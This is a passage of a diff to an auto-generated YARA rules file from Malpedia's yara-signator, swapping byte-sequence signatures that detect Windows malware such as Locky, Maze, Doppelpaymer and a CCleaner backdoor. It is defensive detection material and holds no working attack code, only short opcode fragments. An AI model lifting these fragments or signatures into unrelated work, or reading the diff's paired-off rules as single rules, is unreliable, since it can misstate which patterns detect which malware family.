ff15???????? 6a06 6a01 6a02 ff15???????? } - $sequence_11 = { c705????????00010000 68???????? 68???????? ff15???????? 68???????? ff15???????? } - $sequence_12 = { 6a10 ffb5a8050000 ffb5b8050000 ff15???????? } - $sequence_13 = { 81fb04030000 730c 90 83c004 } - $sequence_14 = { 31c9 90 3108 90 813890909090 } - $sequence_15 = { 637574 6541 0050ff 15???????? c705????????00010000 68???????? 68???????? } + $sequence_0 = { 8bc3 25ff000000 59 3bf0 59 7443 } + $sequence_1 = { 33db 897df8 e8???????? 397dfc 59 59 } + $sequence_2 = { 33ff 59 85c0 7e19 8bf0 8bfe 6a20 } + $sequence_3 = { 66ab ff35???????? aa 8d8588faffff 68???????? 50 } + $sequence_4 = { 8d3c78 8d0437 50 e8???????? 8b4d08 8d3c78 8d0437 } + $sequence_5 = { b9???????? b800020000 8d5f02 99 f7fb 47 8901 } + $sequence_6 = { 33ff 99 59 f7f9 8bc2 03c1 99 } + $sequence_7 = { 59 8945f4 0f848f000000 8d45e8 50 } + $sequence_8 = { e8???????? 83c40c 8d85a4fcffff 6a00 50 ff15???????? 8945e8 } + $sequence_9 = { 740f 3b7df8 7503 8975f8 57 } condition: - 7 of them and filesize <40960 + 7 of them and filesize <229376 } -rule MALPEDIA_Win_Atmspitter_Auto : FILE +rule MALPEDIA_Win_Locky_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f9f02df1-a803-5665-939b-8200861b4172" + id = "0065ec05-3bad-56a6-868c-9fbbe2e6de6d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.atmspitter_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.locky_auto.yar#L1-L170" license_url = "N/A" - logic_hash = "97d22d23e6b57a565b78835f63d6efbbbb7ac3961285afa1ce44048c0fb5a727" + logic_hash = "3ed4a85dfe440bb226db6c3cc6e1aa5c521449c7aa69fbc084d35b1292d156c0" score = 75 quality = 75 tags = "FILE" @@ -154458,34 +157349,40 @@ rule MALPEDIA_Win_Atmspitter_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { a900800000 7422 68???????? e8???????? 83ec24 } - $sequence_1 = { 8be5 5d c3 8b5c2420 33c0 89442450 } - $sequence_2 = { 56 89442418 e8???????? 83c40c 8bf0 8974244c } - $sequence_3 = { a4 c744241831323000 88542422 c744242800000080 89442430 } - $sequence_4 = { 8b442410 50 53 8d4c2468 68???????? 51 ff15???????? } - $sequence_5 = { c3 8b04cd14c04000 5d c3 } - $sequence_6 = { 8975e0 8db190c84000 8975e4 eb2b 8a4601 } - $sequence_7 = { 6a03 6816011200 68???????? ff15???????? 6a02 6a00 8bf8 } - $sequence_8 = { 83c404 8d442420 50 ff15???????? a900800000 7422 } - $sequence_9 = { 6a00 57 ff15???????? 6a00 8d45fc } + $sequence_0 = { 89b560ffffff 898568ffffff ffd7 8bf8 897de0 3bfb } + $sequence_1 = { 8b4db8 3975cc 7303 8d4db8 8b45d4 3975e8 } + $sequence_2 = { 50 50 50 894de8 8b4d08 } + $sequence_3 = { 8d459c 50 8d45b8 50 e8???????? 59 59 } + $sequence_4 = { 46 3bf0 7621 8bc8 d1e9 ba49922409 } + $sequence_5 = { 8bc6 03c1 3810 7412 83ff10 7204 } + $sequence_6 = { 837e1410 8b4610 7202 8b36 50 56 8d45f0 } + $sequence_7 = { 83c9ff 8bf0 51 e8???????? 40 50 } + $sequence_8 = { 03d3 5b c21000 e9???????? 8bff 55 8bec } + $sequence_9 = { 6a44 90 e9???????? 90 } + $sequence_10 = { 5d 90 ebf6 90 } + $sequence_11 = { 83c40c e9???????? 90 8d00 } + $sequence_12 = { 66ab e9???????? 90 8d36 } + $sequence_13 = { ff15???????? e9???????? 90 50 90 } + $sequence_14 = { 66ab 90 e9???????? 8d36 } + $sequence_15 = { 5e c21000 8bff 55 8bec 33c0 8b4d08 } condition: - 7 of them and filesize <147456 + 7 of them and filesize <1122304 } -rule MALPEDIA_Win_Maze_Auto : FILE +rule MALPEDIA_Win_Roopirs_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "107fc7f0-df43-5a49-b2af-87c958bef91f" + id = "57676d4c-d0d7-5b4f-80a4-819b4d474425" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maze" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.maze_auto.yar#L1-L201" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopirs" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.roopirs_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "114687adcaa31dee32acfd0d8a276547892002fc6701cc69c1544ebdb3b57221" + logic_hash = "d4e144778ab9b98b475c3cbfeb400528a9373556893774f62bba1f2eb8f36265" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -154497,41 +157394,32 @@ rule MALPEDIA_Win_Maze_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 53 57 56 83ec10 8b4510 8b4d0c } - $sequence_1 = { 8945f0 c745f000000000 8b45f0 83c410 5e 5f } - $sequence_2 = { 60 8b7d08 8b4d10 8b450c f3aa 61 8945f0 } - $sequence_3 = { 83ec10 8b4510 8b4d0c 8b5508 837d0800 8945ec } - $sequence_4 = { 8945ec 894de8 8955e4 7509 c745f000000000 eb17 60 } - $sequence_5 = { 89c8 0500000001 83d200 89d7 } - $sequence_6 = { 89c7 e8???????? 83c40c 57 55 8dbc24f4000000 } - $sequence_7 = { 89c8 01d6 ba53c6f0ff f7e2 } - $sequence_8 = { 41 41 41 41 41 41 41 } - $sequence_9 = { 83ec20 56 be???????? 56 6a00 6801001200 } - $sequence_10 = { 8d45ec 56 8945f8 6a00 8d45f4 50 c745f40c000000 } - $sequence_11 = { b904000000 6bd109 8b4d08 8b941100100000 c1ea0a } - $sequence_12 = { b948040000 b8cccccccc f3ab a1???????? 33c5 8945ec 50 } - $sequence_13 = { 898d6cfeffff 8b4dfc 8b5508 8b848a10080000 } - $sequence_14 = { 8b8c1040100000 c1e10a ba04000000 c1e200 8b4508 8b941040100000 c1ea16 } - $sequence_15 = { 899594fdffff 8b8d9cfdffff 338d98fdffff 038d94fdffff 8b55fc } - $sequence_16 = { 8b54813c c1e209 8b45fc 8b4d08 8b44813c } - $sequence_17 = { 8985e4feffff 8b45fc 8b4d08 8b548134 } - $sequence_18 = { 8b4dfc 8b5508 8b848a1c080000 c1e017 8b4dfc 8b5508 8b8c8a1c080000 } + $sequence_0 = { c745fc47000000 8b4dd8 51 68???????? ff15???????? 8945c0 } + $sequence_1 = { 50 ff15???????? 898530ffffff eb0a c78530ffffff00000000 33c9 837da800 } + $sequence_2 = { ff15???????? 8d4db0 ff15???????? c745fc07000000 833d????????00 751c 68???????? } + $sequence_3 = { 8945b0 837db000 7d1d 6a20 68???????? 8b45dc 50 } + $sequence_4 = { 8d55d4 52 6a05 ff15???????? 83c418 8d45bc 50 } + $sequence_5 = { 8b02 8b4d80 51 ff5014 dbe2 89857cffffff } + $sequence_6 = { 8b4508 50 8b08 ff5104 8b5514 56 8d45bc } + $sequence_7 = { c78544ffffff00000000 8b45ac 89458c 8d4dcc 51 8b558c } + $sequence_8 = { 68???????? 68???????? ff15???????? c78548ffffffd4624000 eb0a } + $sequence_9 = { 8d4dc8 ff15???????? c745fc07000000 8b4dd8 51 68???????? } condition: - 7 of them and filesize <2318336 + 7 of them and filesize <344064 } -rule MALPEDIA_Win_Poslurp_Auto : FILE +rule MALPEDIA_Win_Bookcodesrat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7a8f0443-88b1-5a4f-a35b-b7bc9acf8924" + id = "12c3f4c8-ae45-5c42-aff9-36df89db636e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poslurp" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.poslurp_auto.yar#L1-L113" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bookcodesrat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bookcodesrat_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "95156f0f62f3b9458f6ba6ac285abaa70aca50d75127c0a8cc32d91b8191c0ea" + logic_hash = "4448935151876512796b7de65b4c6301493ba2a3fb6e7bb9bd7b534c17d01712" score = 75 quality = 75 tags = "FILE" @@ -154545,32 +157433,32 @@ rule MALPEDIA_Win_Poslurp_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f87fd000000 668378203d 0f85f2000000 498bce } - $sequence_1 = { cc 33c9 ff15???????? cc 488bac2440010000 } - $sequence_2 = { 488bf5 498bfc f3a4 498bcc e8???????? } - $sequence_3 = { ff15???????? 4c8be8 4885c0 0f84c2000000 4863453c } - $sequence_4 = { 488d15a9100000 41b93f000f00 4533c0 48c7c102000080 } - $sequence_5 = { 418bc1 41ffc0 486bc022 4803c2 48ffc2 } - $sequence_6 = { 0f8301010000 418bd6 498bcf 8bfb 412bd7 } - $sequence_7 = { 0f84ae000000 80393d 0f85a5000000 418bd6 } - $sequence_8 = { 418bc8 ffce 488bd5 2bcd 8bfb } - $sequence_9 = { 488bd8 4883f8ff 0f84c8010000 448b05???????? 4889ac24a0020000 4889b424a8020000 4889bc24b0020000 } + $sequence_0 = { ff15???????? 488d0d97900100 ff15???????? 833d????????00 750a b901000000 e8???????? } + $sequence_1 = { 33c0 48c7471807000000 48894710 668907 4883c728 493bfe 75d7 } + $sequence_2 = { 488b5c2430 488b742438 4883c420 5f c3 482bf3 66660f1f840000000000 } + $sequence_3 = { 4883c9ff 33c0 488dbb40080000 66f2af 48f7d1 48ffc9 74e8 } + $sequence_4 = { 0f858a000000 ba04010000 488bce ffd7 85c0 744e 33c0 } + $sequence_5 = { 0f1f440000 ffc6 4c8b4310 4883c8ff 492bc0 4883f801 0f868a000000 } + $sequence_6 = { 75ee 488d8d50010000 33d2 41b808020000 e8???????? 488b4c2438 488d442430 } + $sequence_7 = { 488d4c2420 ba04010000 ff15???????? 33c0 4883c9ff 488d7c2420 66f2af } + $sequence_8 = { ff15???????? 418985a8010000 32db 48897c2430 897c2428 897c2420 4533c9 } + $sequence_9 = { 4863c2 4c8bc1 8bd1 888c0560080000 6690 420fb68405a0020000 49ffc0 } condition: - 7 of them and filesize <50176 + 7 of them and filesize <544768 } -rule MALPEDIA_Win_Sharpknot_Auto : FILE +rule MALPEDIA_Win_Portdoor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "50369af8-b07e-5fc0-8a81-2caae560d6bb" + id = "84ef053f-8b45-5899-91c4-5c0973d7e3db" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpknot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sharpknot_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.portdoor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.portdoor_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "c9ade7f96a822eb5e208dc6f180c2f1529ab39e41f40e8790faf2abbc1ccb7f4" + logic_hash = "23b6dfc496aede71e92bc63441565950d5591602bef8ef2eba1715ff0ea58fc2" score = 75 quality = 75 tags = "FILE" @@ -154584,32 +157472,32 @@ rule MALPEDIA_Win_Sharpknot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 8d8c246c020000 c7842498050000ffffffff e8???????? 8b8c2490050000 } - $sequence_1 = { 8bf8 85ff 0f84a7000000 8b442434 53 } - $sequence_2 = { 7c0a 817c241400000400 7304 8b7c2414 6a00 } - $sequence_3 = { 8bd8 0f8494000000 85db 0f848c000000 } - $sequence_4 = { 6804010000 8d842454010000 57 50 e8???????? } - $sequence_5 = { 2beb 8bc1 8bf7 8bfa 53 c1e902 f3a5 } - $sequence_6 = { 50 ff15???????? 8b8c2428020000 6a00 6880000000 6a02 6a00 } - $sequence_7 = { 57 ff15???????? 8b1d???????? 8d4c243c 8bf0 51 } - $sequence_8 = { 50 57 ff15???????? 8b1d???????? 8d4c243c } - $sequence_9 = { 68???????? 51 ffd5 8d542410 8d842450010000 52 50 } + $sequence_0 = { 50 e8???????? 83f8ff 8906 0f95c0 eb2f 807e5100 } + $sequence_1 = { 50 8d85fcf3ffff 50 e8???????? 8bf0 } + $sequence_2 = { ff5718 8903 6a04 59 8d4102 33d2 } + $sequence_3 = { 8945a8 eb04 8365a800 8b45a8 894590 834dfcff 8b4590 } + $sequence_4 = { 50 8b8528e5ffff 0f94c1 898d3ce5ffff 8b8d24e5ffff 8b0485b80f0210 ff3401 } + $sequence_5 = { 894224 6689424c 894248 88424e 8a01 88040b } + $sequence_6 = { 7e21 8b450c 6a00 2bc6 } + $sequence_7 = { 51 51 8d45f8 895df8 } + $sequence_8 = { e8???????? 8bf8 b8eeff0000 59 668907 8b450c 885f02 } + $sequence_9 = { e8???????? a1???????? 33c5 8945fc 53 8b5d08 8d85fdfbffff } condition: - 7 of them and filesize <1032192 + 7 of them and filesize <297984 } -rule MALPEDIA_Win_Helminth_Auto : FILE +rule MALPEDIA_Win_Fanny_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e8458d0c-0e53-5434-b94f-d27e99b6a572" + id = "cd0c75da-8b4c-5363-98ec-15a67064033c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.helminth_auto.yar#L1-L159" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fanny_auto.yar#L1-L171" license_url = "N/A" - logic_hash = "40475479d37d8203c72424a48ad87a8ce641700a54f37b53283dc8f7df269c35" + logic_hash = "415f51a7b92a8dd2e587e9f69b01a611a89ad0fc5dace80d2d81091a3ef0d182" score = 75 quality = 75 tags = "FILE" @@ -154623,37 +157511,38 @@ rule MALPEDIA_Win_Helminth_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { a1???????? 68e8030000 8907 e8???????? } - $sequence_1 = { 83e61f c1e606 57 8b3c9d70750110 8a4c3704 } - $sequence_2 = { 894c2408 8d9b00000000 668b02 83c202 6685c0 } - $sequence_3 = { c1e106 899528e5ffff 53 8b149570750110 898d24e5ffff 8a5c1124 02db } - $sequence_4 = { 85ff 0f84be000000 897de0 8b049d70750110 0500080000 3bf8 } - $sequence_5 = { 03f2 eb5c 8b45f4 8b0c8570750110 f644190448 } - $sequence_6 = { 80c980 884c3704 8b0c9d70750110 8a443124 2481 } - $sequence_7 = { 2c2c 2c2c 232425???????? 2c2c 2c2c 2c2c } - $sequence_8 = { e8???????? 59 6a64 ff15???????? 57 57 } - $sequence_9 = { 8bf9 897c2410 e8???????? 8bcf } - $sequence_10 = { 8a02 8b9524e5ffff 8b0c9d28eb4100 88440a34 8b049d28eb4100 c744023801000000 } - $sequence_11 = { 663bc1 75f4 6a18 59 be???????? } - $sequence_12 = { a1???????? eb0c c745e4a4ee4100 a1???????? 33db } - $sequence_13 = { 83c102 663bc3 75f4 a1???????? 8bd7 } - $sequence_14 = { 6a03 68???????? 8d0c458ce44100 8bc1 2d???????? d1f8 } + $sequence_0 = { 8b45c0 85c0 7422 8935???????? 6a00 } + $sequence_1 = { 8955d0 0fb645cf 3de9000000 7423 0fb64dcf } + $sequence_2 = { 8b4dfc 8b11 52 ff15???????? 85c0 7502 } + $sequence_3 = { 53 ff15???????? 8bf0 83c420 85f6 0f846a010000 } + $sequence_4 = { 8b450c 8945d4 c745c400000000 8b4dc4 3b4dd0 7d26 6a00 } + $sequence_5 = { 53 ff15???????? 8bf0 85f6 7420 6a03 } + $sequence_6 = { eb05 1bc0 83d8ff 85c0 7517 8b842418010000 } + $sequence_7 = { eb57 8b450c 8a4dd0 88481f 8b55d0 52 8b4510 } + $sequence_8 = { 8b4dfc c7410c00000000 ff15???????? 8b55fc } + $sequence_9 = { 53 ff15???????? be00000200 56 } + $sequence_10 = { 5b c9 c3 80a5dcfeffff00 } + $sequence_11 = { 50 e8???????? 83c424 eb03 8b7508 } + $sequence_12 = { 53 ff15???????? 8d85e8fdffff 50 ff15???????? } + $sequence_13 = { 6800400000 6a00 ff15???????? 897c2410 56 } + $sequence_14 = { 53 ff15???????? 8bf0 59 85f6 0f84e9000000 8a4508 } + $sequence_15 = { 33c0 83e103 f3a4 8b13 8b4d00 85d2 760e } condition: - 7 of them and filesize <479232 + 7 of them and filesize <368640 } -rule MALPEDIA_Win_Unidentified_092_Auto : FILE +rule MALPEDIA_Win_Rhttpctrl_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7e18dd30-6337-5c36-a898-b23460fa3b1e" + id = "22fa66be-3212-5731-af64-75e4d7422a17" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_092" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_092_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhttpctrl" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rhttpctrl_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "2159e4ff6c9c542892316c91029887360b4aa3e31c90494be3422bea5bef7c7b" + logic_hash = "1c3d2b43c54e91473434d199f4328e6fb482c73192965602da658da1f5036d20" score = 75 quality = 75 tags = "FILE" @@ -154667,32 +157556,32 @@ rule MALPEDIA_Win_Unidentified_092_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c78520ffffff00000000 c68510ffffff00 83f810 7241 8b8df8feffff 40 3d00100000 } - $sequence_1 = { 723f 8b4c2464 40 3d00100000 722a f6c11f 0f850b010000 } - $sequence_2 = { 33f1 8b7df8 0375a4 8bd3 8b5dfc f7d2 8b4de8 } - $sequence_3 = { 8b41fc 3bc1 0f83de020000 2bc8 83f904 0f82d3020000 83f923 } - $sequence_4 = { 0155ec c1c107 33f1 8bcb 8bd3 } - $sequence_5 = { 56 52 50 8b08 ff511c c745fcffffffff 83ceff } - $sequence_6 = { 8d8558ffffff 50 0f118568ffffff ffd3 c645fc03 83ec10 } - $sequence_7 = { 8bc3 c1c007 8bcb 33d0 897508 f7d1 8bc3 } - $sequence_8 = { 83ee01 75e9 8b85e4fbffff 83f814 } - $sequence_9 = { 50 56 ffd3 85c0 7f38 68???????? } + $sequence_0 = { e8???????? 83c404 833d????????ff 7533 ff15???????? 68???????? c705????????dcfb4100 } + $sequence_1 = { e8???????? 8b404c 83b8a800000000 750e 8b04bd30424200 807c302900 741d } + $sequence_2 = { ffb5dcfbffff c785d8fbffff10fc4100 ff15???????? 33c0 } + $sequence_3 = { c645d800 68???????? 8d45d8 660fd645e9 } + $sequence_4 = { 8be5 5d c3 68???????? ff15???????? 833d????????00 b301 } + $sequence_5 = { 3bf1 756e 8b4bf0 8d73f0 8b01 ff5010 397e0c } + $sequence_6 = { 8b08 85c9 7407 395004 } + $sequence_7 = { 50 8d842498000000 50 e8???????? 83cbff 85c0 } + $sequence_8 = { 50 56 ff15???????? 85c0 7536 8b4714 8b35???????? } + $sequence_9 = { 57 e8???????? ffb5f8feffff 8d85fcfeffff 50 } condition: - 7 of them and filesize <10202112 + 7 of them and filesize <339968 } -rule MALPEDIA_Win_Ironhalo_Auto : FILE +rule MALPEDIA_Win_Fonix_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2d227622-166f-50b3-a1ee-3f19a045e93e" + id = "bd0f7338-d5ae-57b4-8254-a4a394cfa806" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ironhalo_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fonix" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fonix_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "ff7e4c197682c2fb1b52bad6a60a31bcbdcc6f7acd7ddda36a5021d06aae5146" + logic_hash = "a1de19ea9d27789030065bff520751643f536c0deae9fbccf8fe2c31cafb92ef" score = 75 quality = 75 tags = "FILE" @@ -154706,34 +157595,34 @@ rule MALPEDIA_Win_Ironhalo_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 808821cf400008 40 3dff000000 72f1 } - $sequence_1 = { 33c0 8d7c245c 53 f3ab 8d4c2460 6a07 51 } - $sequence_2 = { 6a00 6a00 50 6a00 66c744246c0000 c744246801010000 } - $sequence_3 = { 8d542410 8d442424 52 50 ffd6 } - $sequence_4 = { 52 aa e8???????? 8dbc2434020000 } - $sequence_5 = { 5d c3 8b4c2404 f7c103000000 7414 8a01 41 } - $sequence_6 = { 3b35???????? 0f83c5010000 8bc6 83e61f c1f805 c1e603 8d1c8560e04000 } - $sequence_7 = { 8816 46 eb0f 0fb6d2 f68221cf400004 7403 40 } - $sequence_8 = { 8d542460 68???????? 52 ffd6 8d442460 68???????? 50 } - $sequence_9 = { 75d1 55 ff15???????? 5e 5f } + $sequence_0 = { 50 8d5508 c645fc0e 8d8df4fbffff e8???????? 51 51 } + $sequence_1 = { 83c408 85ff 0f8533ffffff 0f1045a8 8bb56cffffff 0f114590 f30f7e45b8 } + $sequence_2 = { c1c107 894c2434 8b4c2428 03ca 33f1 c1c610 03c6 } + $sequence_3 = { 8b7d74 8d4500 57 50 ff7578 8d4530 c645fc0a } + $sequence_4 = { c645fc1e e8???????? c645fc1f 68???????? 8d8d68fdffff e8???????? 68???????? } + $sequence_5 = { e8???????? bf6e060000 c645fc0a 57 e8???????? 59 8bf0 } + $sequence_6 = { 8bf0 ff5208 0faff0 8d4b0c 56 e8???????? } + $sequence_7 = { 8d8d0cfcffff e8???????? 83ec18 8d4508 } + $sequence_8 = { 8d4101 898d7cffffff 50 8d4dd8 e8???????? 8bd0 8b856cffffff } + $sequence_9 = { 50 56 e8???????? 83c40c 84c0 7404 } condition: - 7 of them and filesize <131072 + 7 of them and filesize <2226176 } -rule MALPEDIA_Win_Doppelpaymer_Auto : FILE +rule MALPEDIA_Win_Ccleaner_Backdoor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f239cfc1-7cb1-5c3d-a2a9-bf2ad44d0856" + id = "fc5d42e4-2b09-51e8-9476-e6d57b9f6fbe" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doppelpaymer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.doppelpaymer_auto.yar#L1-L181" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ccleaner_backdoor_auto.yar#L1-L264" license_url = "N/A" - logic_hash = "6c7514bbe70399e920b266dcf23ab956c2fd28d40abc6464ad39f41a291bdfca" + logic_hash = "437c1ac4e0723d85ccca29c304bbc711ed3ae66fbe1eeb3f8d5172b567e72b6c" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -154745,40 +157634,51 @@ rule MALPEDIA_Win_Doppelpaymer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 80790600 7523 80790264 751d } - $sequence_1 = { 80790561 7517 80790361 7511 80790474 } - $sequence_2 = { e8???????? 8b08 e8???????? 3db6389096 } - $sequence_3 = { 83ec28 6800002002 6a00 6a01 } - $sequence_4 = { 80790264 751d 80790561 7517 } - $sequence_5 = { baffffff7f 43 e8???????? 3bd8 } - $sequence_6 = { 8d8c2450010000 e8???????? 89bc245c010000 8d442404 } - $sequence_7 = { e8???????? 8d8c2424030000 e8???????? 6a10 } - $sequence_8 = { c20400 8b4e44 8b4110 5e } - $sequence_9 = { 8955ec e8???????? 8d0d6f302b00 890424 894c2404 e8???????? 8d0d34302b00 } - $sequence_10 = { 890c24 8945c8 e8???????? 8b4de8 890c24 8945c4 } - $sequence_11 = { c3 8b45e8 b99054c837 8a55f3 80c2c9 2b4df4 } - $sequence_12 = { 83ec08 8b4508 8b4054 89e1 894104 } - $sequence_13 = { 8945c4 74d0 e9???????? 31c0 8b4db8 83c104 } - $sequence_14 = { 5b 5d c3 b8e2f49a29 2b45ec 8b4dcc 81c1ffff0000 } - $sequence_15 = { e8???????? 8b4de8 8b55d8 895128 8b75c4 897114 } - $sequence_16 = { a1???????? ffd0 8945bc 31c0 8b4de8 83c154 8b55e8 } - $sequence_17 = { c20400 8b400c 8b4810 56 8b700c 57 } + $sequence_0 = { 57 ffd6 50 ff15???????? 8b3d???????? } + $sequence_1 = { ff15???????? 8b3d???????? 59 ffd7 } + $sequence_2 = { 750a b857000780 e9???????? e8???????? } + $sequence_3 = { 01460c 488b3f 493bfc 0f8554ffffff } + $sequence_4 = { 00cc cc 4883ec28 488b11 } + $sequence_5 = { 49 75f9 ffd3 6800400000 } + $sequence_6 = { ff75f0 ff15???????? 85c0 0f850c010000 8b35???????? 53 } + $sequence_7 = { 01442424 eb30 8b4508 897518 } + $sequence_8 = { 03c0 894340 8b7340 418bc4 } + $sequence_9 = { 03c6 4863d0 4c8d0c12 4c8d4718 } + $sequence_10 = { 03c6 85c0 7f09 488b0a 488b01 ff5008 488b4b28 } + $sequence_11 = { 891d???????? 68???????? 6a03 53 68???????? ff742424 891d???????? } + $sequence_12 = { 6a04 50 8d45e0 6a04 50 8d85e0feffff 50 } + $sequence_13 = { c1e008 8d8418a1000000 50 e8???????? 85c0 7545 } + $sequence_14 = { 012e 33c0 5f 5e 5d } + $sequence_15 = { 00cc cc 4057 4883ec50 4533db } + $sequence_16 = { 8b7df8 0faff8 ffd6 33f8 } + $sequence_17 = { 01442454 03d1 294c2450 8b4c2410 } + $sequence_18 = { 50 68???????? ff742418 ff15???????? 85c0 0f8579010000 } + $sequence_19 = { c7471854b40210 c1e803 3bc1 7302 8bc8 6afd } + $sequence_20 = { 3bc2 7661 89450c 8a06 46 50 e8???????? } + $sequence_21 = { 013d???????? 8b04b5d8970210 0500080000 3bc8 } + $sequence_22 = { 3b7d10 0f8264010000 3bfa 0f835c010000 2bda 8d4602 } + $sequence_23 = { 013e 33c0 8b16 83c410 } + $sequence_24 = { e8???????? 8b4510 59 f7d8 } + $sequence_25 = { 01442418 03c8 8954242c 8b542470 } + $sequence_26 = { 01461c 8b542424 85d2 7405 } + $sequence_27 = { 01cc cc 48895c2408 57 } + $sequence_28 = { 4c 8bca c1e002 4c 03d5 48 } condition: - 7 of them and filesize <7266304 + 7 of them and filesize <377856 } -rule MALPEDIA_Win_Vigilant_Cleaner_Auto : FILE +rule MALPEDIA_Win_Htprat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a55582e3-616b-5a05-b673-fe9235d58867" + id = "67b2e8d9-4f49-5cf6-8afe-0a9a5bcb5d69" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vigilant_cleaner" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vigilant_cleaner_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.htprat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.htprat_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "c5f2d2527d22c9ed364af085c79f4bf3cbb7661e8edd11d29a8f6f3321af29a9" + logic_hash = "15d5d8ea42e22569434bb0dbf96f0b13036ea7676d82ad93d8f718afb8dd6a66" score = 75 quality = 75 tags = "FILE" @@ -154792,32 +157692,32 @@ rule MALPEDIA_Win_Vigilant_Cleaner_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 53 b868584d56 bb00000000 b90a000000 ba58560000 ed 5b } - $sequence_1 = { ed 5b 59 5a } - $sequence_2 = { b90a000000 ba58560000 